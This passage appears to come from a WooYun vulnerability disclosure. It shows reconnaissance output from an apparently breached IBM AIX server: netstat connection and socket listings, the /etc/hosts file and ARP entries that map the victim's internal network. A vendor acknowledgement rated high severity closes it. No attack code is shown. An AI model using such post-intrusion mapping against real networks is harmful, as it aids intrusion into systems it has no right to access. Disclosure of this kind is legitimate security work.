tcp 0 0 10.2.188.177.40893 10.2.188.178.7003 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.144.2.45.50081 ESTABLISHED
tcp4 0 0 10.2.188.177.7003 10.2.188.177.40901 ESTABLISHED
tcp 0 0 10.2.188.177.40901 10.2.188.177.7003 ESTABLISHED
tcp4 0 0 10.2.188.177.7004 10.2.188.177.40910 ESTABLISHED
tcp 0 0 10.2.188.177.40910 10.2.188.177.7004 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.85.166.94.3933 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.85.166.94.3956 ESTABLISHED
tcp 0 0 10.2.188.177.47495 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.47910 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9002 10.2.188.177.64021 ESTABLISHED
tcp 0 0 10.2.188.177.64021 10.2.188.177.9002 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.2.188.177.64072 ESTABLISHED
tcp 0 0 10.2.188.177.64072 10.2.188.177.9001 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.84.43.146.3852 ESTABLISHED
tcp 0 0 10.2.188.177.48903 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 123.125.71.117.50481 FIN_WAIT_2
tcp 0 0 10.2.188.177.48992 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.40852 10.2.188.178.9003 ESTABLISHED
tcp 0 0 10.2.188.177.49352 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9003 10.2.188.177.40899 ESTABLISHED
tcp 0 0 10.2.188.177.40899 10.2.188.177.9003 ESTABLISHED
tcp 0 0 10.2.188.177.40902 10.2.188.178.9003 ESTABLISHED
tcp4 0 0 10.2.188.177.9003 10.2.188.177.40905 ESTABLISHED
tcp 0 0 10.2.188.177.40905 10.2.188.177.9003 ESTABLISHED
tcp 0 0 10.2.188.177.49625 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.49780 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.40031 10.2.133.102.80 LAST_ACK
tcp4 0 0 10.2.188.177.9002 10.2.188.177.41706 ESTABLISHED
tcp 0 0 10.2.188.177.41706 10.2.188.177.9002 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4822 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4823 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4824 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4825 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4826 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4827 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4828 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4829 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4830 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4831 ESTABLISHED
tcp 0 0 10.2.188.177.50680 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 127.0.0.1.32769 127.0.0.1.32771 ESTABLISHED
tcp 0 0 127.0.0.1.32771 127.0.0.1.32769 ESTABLISHED
tcp4 0 0 127.0.0.1.32769 127.0.0.1.32772 ESTABLISHED
tcp 0 0 127.0.0.1.32772 127.0.0.1.32769 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 114.242.173.178.59010 ESTABLISHED
udp4 0 0 *.* *.*
udp4 0 0 *.* *.*
udp4 0 0 *.* *.*
udp4 0 0 *.* *.*
udp4 0 0 *.* *.*
udp4 0 0 *.13 *.*
udp4 0 0 *.37 *.*
udp4 0 0 *.111 *.*
udp 0 0 127.255.255.255.123 *.*
udp 0 0 10.2.188.255.123 *.*
udp4 0 0 127.0.0.1.123 *.*
udp4 0 0 10.2.188.177.123 *.*
udp4 0 0 *.123 *.*
udp 0 0 *.161 *.*
udp 0 0 *.427 *.*
udp 0 0 *.514 *.*
udp4 0 0 *.518 *.*
udp 0 0 *.657 *.*
udp4 0 0 *.2279 *.*
udp 0 0 *.7001 *.*
udp 0 0 *.7001 *.*
udp4 0 0 *.32783 *.*
udp4 0 0 *.32809 *.*
udp4 0 0 *.32818 *.*
udp4 0 0 *.32831 *.*
udp4 0 0 *.32844 *.*
udp4 0 0 *.32857 *.*
udp4 0 0 *.32862 *.*
udp 0 0 *.32927 *.*
udp 0 0 *.32970 *.*
udp 0 0 *.9002 *.*
udp 0 0 *.14252 *.*
udp 0 0 *.14253 *.*
活动的 UNIX domain sockets
SADR/PCB Type Recv-Q Send-Q Inode Conn Refs Nextref Addr
f1000e0001ca9808 dgram 0 0 f1000a028076f820 0 0 0 /dev/.SRC-unix/SRCsHasib
f1000e0001cab500
f1000e00027b2808 dgram 0 0 f1000a0281160c20 0 0 0 /dev/.SRC-unix/SRCzLasif
f1000e0001cabf80
f1000e0001caec08 dgram 0 0 f1000a028077fc20 0 0 0 /dev/.SRC-unix/SRCtLasic
f1000e0001cab980
f1000e00027b4008 dgram 0 0 f1000a02810f0c20 0 f1000e00029eac00 0 /dev/log
f1000e0001cabf00
f1000e00027b4408 dgram 0 0 f1000a0281280820 0 0 0 /dev/.SRC-unix/SRCzXasid
f1000e0001cab280
f1000e0001ca9408 dgram 0 0 f1000a0281260c20 0 0 0 /dev/.SRC-unix/SRC1Lasih
f1000e0001cab080
f1000e0001ca9008 dgram 0 0 0 f1000e0001cabf00 0 f1000e0000a28300
f1000e0001cab780
f1000e00027b4c08 dgram 0 0 f1000a02812a0c20 0 0 0 /dev/.SRC-unix/SRC1Xasii
f1000e0001cabb00
f1000e00027b3c08 dgram 0 0 f1000a0280cf1020 0 0 0 /dev/.SRC-unix/SRC1-asij
f1000e0001cab800
f1000e00027bbc08 stream 0 0 f1000a0281216420 0 0 0 /var/cim/elasocket_cimv2
f1000e0000051100
f1000e00027ba808 dgram 0 0 f1000a0281142020 0 0 0 /dev/.SRC-unix/SRC5Xasik
f1000e0001cabd00
f1000e00027bc408 stream 0 0 f1000a02813d5c20 0 0 0 /var/ct/IW/soc/mc/rmsrv
f1000e0001cab600
f1000e00027b8008 stream 0 0 f1000a0281345c20 0 0 0 /var/ct/IW/soc/mc/clsrv
f1000e0001cab880
f1000e00027b7008 stream 0 0 f1000a0281457020 0 0 0 /var/ct/IW/soc/mc/RMIBM.DRM.0
f1000e0001cab380
f1000e00027bc808 stream 0 0 f1000a0281359420 0 0 0 /var/ct/IW/soc/mc/RMIBM.ServiceRM.0
f1000e0001cab680
f1000e00027bb808 stream 0 0 0 f1000e00027bff80 0 0
f1000e0001cab900
f1000e00027b8408 dgram 0 0 0 f1000e0001cabf00 0 f1000e0000f67980
f1000e00027bfe00
f1000e00027b3808 dgram 0 0 f1000a02813b6420 0 0 0 /dev/.SRC-unix/SRCcXasim
f1000e0001cab100
f1000e00027bc008 stream 0 0 f1000a02813a7020 0 0 0 /var/ct/IW/soc/mc/RMIBM.CSMAgentRM.0
f1000e0001cab200
f1000e00027be408 stream 0 0 0 f1000e0001cab300 0 0
f1000e0001cab000
f1000e00027b7408 stream 0 0 0 f1000e0001cab700 0 0
f1000e0001cabd80
f1000e00027ed808 stream 0 0 f1000a029bb9b820 0 0 0 /var/ct/IW/soc/mc/RMIBM.MgmtDomainRM.0
f1000e00027bf080
f1000e0002e4a008 dgram 0 0 0 f1000e0001cabf00 0 f1000e00027bfe00
f1000e00027bfd80
f1000e00027e3808 stream 0 0 0 0 0 0
f1000e0003389780
f1000e0002caa808 stream 0 0 0 0 0 0
f1000e0003499e00
f1000e0002865c08 dgram 0 0 0 f1000e0001cabf00 0 f1000e00027bfd80
f1000e00029eac00
f1000e0000a21808 dgram 0 0 f1000a028085f420 0 0 0 /dev/.SRC-unix/SRCsXasia
f1000e0000a28800
f1000e0000521008 dgram 0 0 f1000a02806cf420 0 0 0 /dev/SRC
f1000e0000520180
f1000e0000f66808 dgram 0 0 f1000a02811f0c20 0 0 0 /dev/.SRC-unix/SRCz-asig
f1000e0000f67300
f1000e000053d008 dgram 0 0 0 f1000e0001cabf00 0 f1000e0001cab780
f1000e0000520c80
f1000e0000f66408 dgram 0 0 f1000a0281110c20 0 0 0 /dev/.SRC-unix/SRCz-asie
f1000e0000f67480
f1000e0000a2d808 dgram 0 0 0 f1000e0001cabf00 0 0
f1000e0000a28300
f1000e000053d408 stream 0 0 f1000a02810f3820 0 0 0 /etc/cluster/clcomd_sec
f1000e0000520a00
f1000e0000a3a408 stream 0 0 0 0 0 0
f1000e0000a28a00
f1000e0000f75008 dgram 0 0 0 f1000e0001cabf00 0 f1000e0000520c80
f1000e0000f67980
f1000e0000f75c08 dgram 0 0 f1000a0281329020 0 0 0 /dev/.SRC-unix/SRCjXasiq
f1000e0000f26200
f1000e0000529c08 dgram 0 0 f1000a0281317020 0 0 0 /dev/.SRC-unix/SRCeHasin
f1000e0000520480
f1000e0000f88408 dgram 0 0 f1000a0281301420 0 0 0 /dev/.SRC-unix/SRCXXasil
f1000e0000f67200
f1000e00027bd008 stream 0 0 0 f1000e0001cab000 0 0 /var/ct/IW/soc/mc/RMIBM.CSMAgentRM.0
f1000e0001cab300
f1000e00027b8808 stream 0 0 0 f1000e0001cab900 0 0 /var/ct/IW/soc/mc/RMIBM.ServiceRM.0
f1000e00027bff80
f1000e00027bac08 stream 0 0 0 f1000e0001cabd80 0 0 /var/ct/IW/soc/mc/RMIBM.DRM.0
f1000e0001cab700
f1000e0000a26008 stream 0 0 f1000a028169d020 0 0 0 /opt/freeware/cimom/pegasus/etc/cimxml.socket
f1000e0000a28700
f1000e0005019c08 stream 0 0 0 0 0 0
f1000e0000f67f80
f1000e0006a64008 stream 0 0 0 0 0 0
f1000e0001b13300
f1000e000507a808 stream 0 0 0 0 0 0
f1000e00049b9500
f1000e000bd2d008 stream 0 0 0 0 0 0
f1000e0001a1cb80
f1000e000496d408 dgram 0 0 f1000a029bb6b820 0 0 0 /dev/.SRC-unix/SRCcXasEC
f1000e00049be900
f1000e000498b408 stream 0 0 0 f1000e00049bd600 0 0
f1000e00049b5980
f1000e0004971808 stream 0 0 0 f1000e00049b5980 0 0 /var/ct/IW/soc/mc/RMIBM.MgmtDomainRM.0
f1000e00049bd600
f1000e0006b0f008 stream 0 0 0 0 0 0
f1000e0008fdfb80
f1000e0000ac2008 stream 0 0 0 0 0 0
f1000e0002059080
f1000e0000b2fc08 stream 0 0 0 0 0 0
f1000e0000a28100


探测一下内网:
好详细

# @(#)47	1.2  src/bos/usr/sbin/netstart/hosts, cmdnet, bos61D, d2007_49A2 10/1/07 13:57:52
# IBM_PROLOG_BEGIN_TAG
# This is an automatically generated prolog.
#
# bos61D src/bos/usr/sbin/netstart/hosts 1.2
#
# Licensed Materials - Property of IBM
#
# COPYRIGHT International Business Machines Corp. 1985,1989
# All Rights Reserved
#
# US Government Users Restricted Rights - Use, duplication or
# disclosure restricted by GSA ADP Schedule Contract with IBM Corp.
#
# IBM_PROLOG_END_TAG
#
# COMPONENT_NAME: TCPIP hosts
#
# FUNCTIONS: loopback
#
# ORIGINS: 26 27
#
# (C) COPYRIGHT International Business Machines Corp. 1985, 1989
# All Rights Reserved
# Licensed Materials - Property of IBM
#
# US Government Users Restricted Rights - Use, duplication or
# disclosure restricted by GSA ADP Schedule Contract with IBM Corp.
#
# /etc/hosts
#
# This file contains the hostnames and their address for hosts in the
# network. This file is used to resolve a hostname into an Internet
# address.
#
# At minimum, this file must contain the name and address for each
# device defined for TCP in your /etc/net file. It may also contain
# entries for well-known (reserved) names such as timeserver
# and printserver as well as any other host name and address.
#
# The format of this file is:
# Internet Address Hostname # Comments
# Internet Address can be either IPv4 or IPv6 address.
# Items are separated by any number of blanks and/or tabs. A '#'
# indicates the beginning of a comment; characters up to the end of the
# line are not interpreted by routines which search this file. Blank
# lines are allowed.
# Internet Address Hostname # Comments
# 192.9.200.1 net0sample # ethernet name/address
# 128.100.0.1 token0sample # token ring name/address
# 10.2.0.2 x25sample # x.25 name/address
# 2000:1:1:1:209:6bff:feee:2b7f ipv6sample # ipv6 name/address
127.0.0.1 loopback localhost # loopback (lo0) name/address
10.5.86.190 localhost
10.5.86.191 localhost
10.2.188.177 localhost


?(10.2.188.1)位于0:9:f:9:0:a [ethernet] stored in bucket 51
?(10.2.188.178)位于0:15:17:6f:26:fd [ethernet] stored in bucket 79
?(10.2.188.82)位于d8:9d:67:32:ca:27 [ethernet] stored in bucket 132


修复方案:

版权声明:转载请注明来源 牛 小 帅@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-30 16:49

厂商回复:

谢谢!我们会尽快修复。

最新状态:

暂无